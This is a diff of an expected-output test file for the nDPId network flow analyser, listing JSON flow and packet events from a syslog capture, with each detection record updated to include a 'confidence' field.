 00440{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"syslog.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600781689297,"flow_last_seen":1600781689297,"flow_idle_time":180000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":0,"ts_msec":1600781689297,"l3_proto":"ip4","src_ip":"172.21.251.36","dst_ip":"172.19.196.11","src_port":62679,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00540{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1600781689297,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":124,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":124,"pkt_l4_len":90,"ts_msec":1600781689297,"pkt":"qrvMbk9eqrvMlgwFCABFAABuAAAAAP8RpCWsFfskrBPEC\/TXAgIAWrkePDE4OT4zMDogKlNlcCAyMiAxMzozNDo0OS4xOTU6ICVTWVMtNS1DT05GSUdfSTogQ29uZmlndXJlZCBmcm9tIGNvbnNvbGUgYnkgY29uc29sZQ=="}
-00607{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600781689297,"flow_last_seen":1600781689297,"flow_idle_time":180000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":0,"ts_msec":1600781689297,"l3_proto":"ip4","src_ip":"172.21.251.36","dst_ip":"172.19.196.11","src_port":62679,"dst_port":514,"l4_proto":"udp","ndpi": {"proto":"Syslog","breed":"Acceptable","category":"System"}}
+00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600781689297,"flow_last_seen":1600781689297,"flow_idle_time":180000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":0,"ts_msec":1600781689297,"l3_proto":"ip4","src_ip":"172.21.251.36","dst_ip":"172.19.196.11","src_port":62679,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}}
 00589{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1600781690282,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":160,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":160,"pkt_l4_len":126,"ts_msec":1600781690282,"pkt":"qrvMbk9eqrvMlgwFCABFAACSAAEAAP8RpACsFfskrBPEC\/TXAgIAfpjBPDE5MD4zMTogKlNlcCAyMiAxMzozNDo0OS4yMjA6ICVTWVMtNi1MT0dHSU5HSE9TVF9TVEFSVFNUT1A6IExvZ2dpbmcgdG8gaG9zdCAxMC4xLjIuMiBwb3J0IDUxNCBzdGFydGVkIC0gQ0xJIGluaXRpYXRlZA=="}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600781776117,"flow_last_seen":1600781776117,"flow_idle_time":180000,"flow_min_l4_payload_len":116,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":116,"midstream":0,"ts_msec":1600781776117,"l3_proto":"ip4","src_ip":"192.168.72.140","dst_ip":"192.168.178.148","src_port":62679,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00584{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1600781776117,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":158,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":158,"pkt_l4_len":124,"ts_msec":1600781776117,"pkt":"qrvMXnUpqrvMO4StCABFAACQAAMAAP8RPujAqEiMwKiylPTXAgIAfAzhPDE0PjMzOiAqU2VwIDIyIDEzOjM2OjE1LjMwODogJVNZUy02LUxPR0dJTkdIT1NUX1NUQVJUU1RPUDogTG9nZ2luZyB0byBob3N0IDEwLjEuMi4yIHBvcnQgNTE0IHJlc3RvcmVkIENMSSBpbml0aWF0ZWQ="}
-00614{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600781776117,"flow_last_seen":1600781776117,"flow_idle_time":180000,"flow_min_l4_payload_len":116,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":116,"midstream":0,"ts_msec":1600781776117,"l3_proto":"ip4","src_ip":"192.168.72.140","dst_ip":"192.168.178.148","src_port":62679,"dst_port":514,"l4_proto":"udp","ndpi": {"proto":"Syslog","breed":"Acceptable","category":"System"}}
+00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600781776117,"flow_last_seen":1600781776117,"flow_idle_time":180000,"flow_min_l4_payload_len":116,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":116,"midstream":0,"ts_msec":1600781776117,"l3_proto":"ip4","src_ip":"192.168.72.140","dst_ip":"192.168.178.148","src_port":62679,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}}
 00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1600781777157,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"ts_msec":1600781777157,"pkt":"qrvMXnUpqrvMO4StCABFAABtAAQAAP8RPwrAqEiMwKiylPTXAgIAWZ\/\/PDEzPjM0OiAqU2VwIDIyIDEzOjM2OjE2LjA5MTogJVNZUy01LUNPTkZJR19JOiBDb25maWd1cmVkIGZyb20gY29uc29sZSBieSBjb25zb2xl"}
-00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1600781689297,"flow_last_seen":1600781690282,"flow_idle_time":180000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":118,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":100,"midstream":0,"ts_msec":1600781952293,"l3_proto":"ip4","src_ip":"172.21.251.36","dst_ip":"172.19.196.11","src_port":62679,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Syslog","breed":"Acceptable","category":"System"}}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1600781776117,"flow_last_seen":1600781777157,"flow_idle_time":180000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":98,"midstream":0,"ts_msec":1600781952293,"l3_proto":"ip4","src_ip":"192.168.72.140","dst_ip":"192.168.178.148","src_port":62679,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Syslog","breed":"Acceptable","category":"System"}}
+00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1600781689297,"flow_last_seen":1600781690282,"flow_idle_time":180000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":118,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":100,"midstream":0,"ts_msec":1600781952293,"l3_proto":"ip4","src_ip":"172.21.251.36","dst_ip":"172.19.196.11","src_port":62679,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1600781776117,"flow_last_seen":1600781777157,"flow_idle_time":180000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":98,"midstream":0,"ts_msec":1600781952293,"l3_proto":"ip4","src_ip":"192.168.72.140","dst_ip":"192.168.178.148","src_port":62679,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600781952293,"flow_last_seen":1600781952293,"flow_idle_time":180000,"flow_min_l4_payload_len":93,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":93,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1600781952293,"l3_proto":"ip4","src_ip":"192.168.67.241","dst_ip":"10.193.53.6","src_port":62679,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00552{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1600781952293,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":135,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":135,"pkt_l4_len":101,"ts_msec":1600781952293,"pkt":"qrvMySBnqrvMPDqhCABFAAB5AAgAAP8RdwvAqEPxCsE1BvTXAgIAZVTQPDE4Nz4zODogUjE6ICpTZXAgMjIgMTM6Mzk6MTEuMjUwOiAlTElOSy0zLVVQRE9XTjogSW50ZXJmYWNlIEV0aGVybmV0MC8yLCBjaGFuZ2VkIHN0YXRlIHRvIHVw"}
-00606{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600781952293,"flow_last_seen":1600781952293,"flow_idle_time":180000,"flow_min_l4_payload_len":93,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":93,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1600781952293,"l3_proto":"ip4","src_ip":"192.168.67.241","dst_ip":"10.193.53.6","src_port":62679,"dst_port":514,"l4_proto":"udp","ndpi": {"proto":"Syslog","breed":"Acceptable","category":"System"}}
+00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600781952293,"flow_last_seen":1600781952293,"flow_idle_time":180000,"flow_min_l4_payload_len":93,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":93,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1600781952293,"l3_proto":"ip4","src_ip":"192.168.67.241","dst_ip":"10.193.53.6","src_port":62679,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}}
 00584{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1600781952293,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":157,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":157,"pkt_l4_len":123,"ts_msec":1600781952293,"pkt":"qrvMySBnqrvMPDqhCABFAACPAAkAAP8RdvTAqEPxCsE1BvTXAgIAe0jbPDE4OT4zOTogUjE6ICpTZXAgMjIgMTM6Mzk6MTIuMjUyOiAlTElORVBST1RPLTUtVVBET1dOOiBMaW5lIHByb3RvY29sIG9uIEludGVyZmFjZSBFdGhlcm5ldDAvMiwgY2hhbmdlZCBzdGF0ZSB0byB1cA=="}
-00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1600781952293,"flow_last_seen":1600781952293,"flow_idle_time":180000,"flow_min_l4_payload_len":93,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":104,"midstream":0,"ts_msec":1600782411853,"l3_proto":"ip4","src_ip":"192.168.67.241","dst_ip":"10.193.53.6","src_port":62679,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Syslog","breed":"Acceptable","category":"System"}}
+00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1600781952293,"flow_last_seen":1600781952293,"flow_idle_time":180000,"flow_min_l4_payload_len":93,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":104,"midstream":0,"ts_msec":1600782411853,"l3_proto":"ip4","src_ip":"192.168.67.241","dst_ip":"10.193.53.6","src_port":62679,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600782411853,"flow_last_seen":1600782411853,"flow_idle_time":180000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":0,"ts_msec":1600782411853,"l3_proto":"ip4","src_ip":"192.168.126.102","dst_ip":"172.19.177.230","src_port":57166,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00836{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1600782411853,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":346,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":346,"pkt_l4_len":312,"ts_msec":1600782411853,"pkt":"qrvMCetCqrvMS9ZJCABFAAFMAAAAAP8RHZjAqH5mrBOx5t9OAgIBOHsYPDE5MD44MjogUjE6IFtzeXNsb2dAOSBzX3NuPSIxIl06IDxpb3MtbG9nLW1zZz48ZmFjaWxpdHk+U1lTPC9mYWNpbGl0eT48c2V2ZXJpdHk+Njwvc2V2ZXJpdHk+PG1zZy1pZD5MT0dHSU5HSE9TVF9TVEFSVFNUT1A8L21zZy1pZD48dGltZT4qU2VwIDIyIDEzOjQ2OjUwLjgxMjwvdGltZT48YXJncz48YXJnIGlkPSIwIj4xMC4xLjIuMjwvYXJnPjxhcmcgaWQ9IjEiPiBwb3J0IDUxNDwvYXJnPjxhcmcgaWQ9IjIiPjwvYXJnPjxhcmcgaWQ9IjMiPiBzdGFydGVkIC0gQ0xJIGluaXRpYXRlZDwvYXJnPjwvYXJncz48L2lvcy1sb2ctbXNnPg=="}
-00614{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600782411853,"flow_last_seen":1600782411853,"flow_idle_time":180000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":0,"ts_msec":1600782411853,"l3_proto":"ip4","src_ip":"192.168.126.102","dst_ip":"172.19.177.230","src_port":57166,"dst_port":514,"l4_proto":"udp","ndpi": {"proto":"Syslog","breed":"Acceptable","category":"System"}}
+00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600782411853,"flow_last_seen":1600782411853,"flow_idle_time":180000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":0,"ts_msec":1600782411853,"l3_proto":"ip4","src_ip":"192.168.126.102","dst_ip":"172.19.177.230","src_port":57166,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}}
 00732{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1600782437280,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":268,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":268,"pkt_l4_len":234,"ts_msec":1600782437280,"pkt":"qrvMCetCqrvMS9ZJCABFAAD+AAEAAP8RHeXAqH5mrBOx5t9OAgIA6uDbPDE4Nz44MzogUjE6IFtzeXNsb2dAOSBzX3NuPSIyIl06IDxpb3MtbG9nLW1zZz48ZmFjaWxpdHk+TElOSzwvZmFjaWxpdHk+PHNldmVyaXR5PjM8L3NldmVyaXR5Pjxtc2ctaWQ+VVBET1dOPC9tc2ctaWQ+PHRpbWU+KlNlcCAyMiAxMzo0NzoxNi40MDQ8L3RpbWU+PGFyZ3M+PGFyZyBpZD0iMCI+RXRoZXJuZXQwLzM8L2FyZz48YXJnIGlkPSIxIj51cDwvYXJnPjwvYXJncz48L2lvcy1sb2ctbXNnPg=="}
 00732{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1600782437466,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":270,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":270,"pkt_l4_len":236,"ts_msec":1600782437466,"pkt":"qrvMCetCqrvMS9ZJCABFAAEAAAIAAP8RHeLAqH5mrBOx5t9OAgIA7NFUPDE4OT44NDogUjE6IFtzeXNsb2dAOSBzX3NuPSIzIl06IDxpb3MtbG9nLW1zZz48ZmFjaWxpdHk+U1lTPC9mYWNpbGl0eT48c2V2ZXJpdHk+NTwvc2V2ZXJpdHk+PG1zZy1pZD5DT05GSUdfSTwvbXNnLWlkPjx0aW1lPipTZXAgMjIgMTM6NDc6MTcuMTk2PC90aW1lPjxhcmdzPjxhcmcgaWQ9IjAiPmNvbnNvbGU8L2FyZz48YXJnIGlkPSIxIj5jb25zb2xlPC9hcmc+PC9hcmdzPjwvaW9zLWxvZy1tc2c+"}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600782466695,"flow_last_seen":1600782466695,"flow_idle_time":180000,"flow_min_l4_payload_len":107,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1600782466695,"l3_proto":"ip4","src_ip":"10.22.179.215","dst_ip":"172.26.54.76","src_port":57166,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00573{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1600782466695,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":149,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":149,"pkt_l4_len":115,"ts_msec":1600782466695,"pkt":"qrvMdK0EqrvMag4ECABFAACHAAQAAP8RGw4KFrPXrBo2TN9OAgIAcw8OPDE4OT44NTogUjE6IFtzeXNsb2dAOSBzX3NuPSI1Il06ICpTZXAgMjIgMTM6NDc6NDUuNjcyOiAlU1lTLTUtQ09ORklHX0k6IENvbmZpZ3VyZWQgZnJvbSBjb25zb2xlIGJ5IGNvbnNvbGU="}
-00611{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600782466695,"flow_last_seen":1600782466695,"flow_idle_time":180000,"flow_min_l4_payload_len":107,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1600782466695,"l3_proto":"ip4","src_ip":"10.22.179.215","dst_ip":"172.26.54.76","src_port":57166,"dst_port":514,"l4_proto":"udp","ndpi": {"proto":"Syslog","breed":"Acceptable","category":"System"}}
+00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600782466695,"flow_last_seen":1600782466695,"flow_idle_time":180000,"flow_min_l4_payload_len":107,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1600782466695,"l3_proto":"ip4","src_ip":"10.22.179.215","dst_ip":"172.26.54.76","src_port":57166,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}}
 00621{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1600782475311,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"ts_msec":1600782475311,"pkt":"qrvMdK0EqrvMag4ECABFAACrAAUAAP8RGukKFrPXrBo2TN9OAgIAl+OwPDE5MD44NjogUjE6IFtzeXNsb2dAOSBzX3NuPSI2Il06ICpTZXAgMjIgMTM6NDc6NTQuMzAzOiAlU1lTLTYtTE9HR0lOR0hPU1RfU1RBUlRTVE9QOiBMb2dnaW5nIHRvIGhvc3QgMTAuMS4yLjIgcG9ydCA1MTQgc3RvcHBlZCAtIENMSSBpbml0aWF0ZWQ="}
 00621{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1600782476392,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":184,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":184,"pkt_l4_len":150,"ts_msec":1600782476392,"pkt":"qrvMdK0EqrvMag4ECABFAACqAAYAAP8RGukKFrPXrBo2TN9OAgIAlm33PDE5MD44NzogUjE6IFtzeXNsb2dAOSBzX3NuPSI3Il06ICpTZXAgMjIgMTM6NDc6NTUuNjk5OiAlU1lTLTYtTE9HR0lOR0hPU1RfU1RBUlRTVE9QOiBMb2dnaW5nIHRvIGhvc3QgMTAuMS4yLjIgcG9ydCA1MTQgcmVzdG9yZWQgQ0xJIGluaXRpYXRlZA=="}
-00656{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":16,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1600782411853,"flow_last_seen":1600782438439,"flow_idle_time":180000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":989,"flow_avg_l4_payload_len":247,"midstream":0,"ts_msec":1600782514222,"l3_proto":"ip4","src_ip":"192.168.126.102","dst_ip":"172.19.177.230","src_port":57166,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Syslog","breed":"Acceptable","category":"System"}}
+00682{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":16,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1600782411853,"flow_last_seen":1600782438439,"flow_idle_time":180000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":989,"flow_avg_l4_payload_len":247,"midstream":0,"ts_msec":1600782514222,"l3_proto":"ip4","src_ip":"192.168.126.102","dst_ip":"172.19.177.230","src_port":57166,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600782514222,"flow_last_seen":1600782514222,"flow_idle_time":180000,"flow_min_l4_payload_len":207,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":207,"midstream":0,"ts_msec":1600782514222,"l3_proto":"ip4","src_ip":"192.168.45.162","dst_ip":"10.208.120.95","src_port":57166,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00706{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1600782514222,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":249,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":249,"pkt_l4_len":215,"ts_msec":1600782514222,"pkt":"qrvMkvyHqrvMTZFeCABFAADrAAkAAP8RSX\/AqC2iCtB4X99OAgIA1wa4PDE4OT45MjogUjE6IDxpb3MtbG9nLW1zZz48ZmFjaWxpdHk+U1lTPC9mYWNpbGl0eT48c2V2ZXJpdHk+NTwvc2V2ZXJpdHk+PG1zZy1pZD5DT05GSUdfSTwvbXNnLWlkPjx0aW1lPipTZXAgMjIgMTM6NDg6MzMuOTc4PC90aW1lPjxhcmdzPjxhcmcgaWQ9IjAiPmNvbnNvbGU8L2FyZz48YXJnIGlkPSIxIj5jb25zb2xlPC9hcmc+PC9hcmdzPjwvaW9zLWxvZy1tc2c+"}
-00613{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600782514222,"flow_last_seen":1600782514222,"flow_idle_time":180000,"flow_min_l4_payload_len":207,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":207,"midstream":0,"ts_msec":1600782514222,"l3_proto":"ip4","src_ip":"192.168.45.162","dst_ip":"10.208.120.95","src_port":57166,"dst_port":514,"l4_proto":"udp","ndpi": {"proto":"Syslog","breed":"Acceptable","category":"System"}}
+00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"syslog.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600782514222,"flow_last_seen":1600782514222,"flow_idle_time":180000,"flow_min_l4_payload_len":207,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":207,"midstream":0,"ts_msec":1600782514222,"l3_proto":"ip4","src_ip":"192.168.45.162","dst_ip":"10.208.120.95","src_port":57166,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}}
